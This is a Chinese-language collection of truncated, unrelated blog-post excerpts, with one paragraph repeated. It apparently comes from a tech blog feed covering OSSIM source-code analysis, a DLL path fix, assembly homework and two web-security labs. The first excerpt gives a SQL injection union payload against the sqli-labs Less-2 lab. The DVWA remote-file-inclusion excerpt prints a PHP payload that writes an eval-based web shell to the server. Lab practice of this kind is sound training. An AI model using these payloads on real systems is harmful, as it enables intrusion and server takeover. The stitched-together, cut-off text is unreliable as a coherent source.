问题背景：在进行SQL注入时，发现注入点后，准备查询information_schema数据库中schema表中的数据库名（schema_name）拼接url：http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(schema_name) ,3 from information_schema.schemata发现报错：Illegal

2021SC@SDUSC一、OSSIM简介OSSIM即开源安全信息管理系统(OPEN SOURCE SECURITY INFORMATION MANAGEMENT)，由美国的Alien Vault公司开发，是一个非常流行和完整的开源安全架构体系。OSSIM通过将开源产品进行集成，从而提供一种能够实现安全监控功能的基础平台。 它的目的是提供一种集中式、有组织的、能够更好地进行监测和显示的框架式系统。

解决办法：配置环境变量1、找到环境变量配置2、找到xxx.dll文件目录，复制目录3、粘贴在path接下来全部确定之后就可以打开原来的exe文件了

汇编语言王爽老师实验五

一、OSSIM功能分析（Web UI）

2021SC@SDUSC一、OSSIM简介OSSIM即开源安全信息管理系统(OPEN SOURCE SECURITY INFORMATION MANAGEMENT)，由美国的Alien Vault公司开发，是一个非常流行和完整的开源安全架构体系。OSSIM通过将开源产品进行集成，从而提供一种能够实现安全监控功能的基础平台。 它的目的是提供一种集中式、有组织的、能够更好地进行监测和显示的框架式系统。

2021SC@SDUSC目录五、OSSIM关联分析的部分源代码分析1、sim-directive.c1.1、初识 glib1.2、glib 基本类型定义1.3、glib 函数1.4、源码分析五、OSSIM关联分析的部分源代码分析OSSIM系统中，关联分析部分源码目录：\ossim\alienvault-ossim\src\alienvault-ossim\os-sim\src1、sim-direc

2021SC@SDUSC七、Agent部分源代码分析1、Agent 简介OSSIM Agent中所有脚本采用 Python 编写，负责从安全设备采集相关信息（比如报警日志等），并将采集到的各类信息统一格式，最后将这些数据传至 Server。从采集方式上看，Agent 属于主动采集，可以形象理解为由OSSIM Server 安插在各个监控网段的“耳目”，由它们收集数据，并主动推送到 Collecto

DVWA中文件包含漏洞（远程文件包含）一、利用kali虚拟机建立服务器，并建立x.txt文件作为远程上传文件：1、开启kali服务器，输入命令service apache2 start2、建立x.txt，在/var/www/html/目录下创建，内容为：<?fputs(fopen("shell60.php","w"),'<?php eval($_POST[moxi]);?>')?

2021SC@SDUSC本周内容是上周的延续，在本周的文章里，完成了对 OSSIM 安全信息管理系统的 Frameworkd 模块的所有源码以及实现原理的分析。同时完成了 OSSIM 的日志分析部分的简要概述与分析。下周开始，将对 OSSIM 的关联分析机制进行源码分析。一、OSSIM frameworkd 源码分析1、OssimDB.py这里主要实现的功能就是在 Framework 模块中有关数